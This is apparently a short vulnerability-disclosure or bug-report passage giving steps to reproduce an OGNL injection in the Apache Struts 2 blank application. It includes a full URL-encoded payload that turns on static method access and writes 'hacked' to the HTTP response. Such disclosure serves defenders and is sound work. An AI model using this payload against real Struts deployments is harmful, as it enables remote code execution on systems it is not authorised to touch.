THIS IS A TEST INSTANCE. ALL YOUR CHANGES WILL BE LOST!!!!
...
- Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
Such that the line will be something look like this:Code Block includeParams="all"
(it works also with includeParams="get").Code Block xml xml <s:url id="url" action="HelloWorld" includeParams="all">
- Run struts2-blank app
- Open the url: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
(this is the shortened version http://goo.gl/lhlTl)
As you will notice, in this case, there is no way to escape/sanitize the fakeParam, since it's not an expected parameter.
...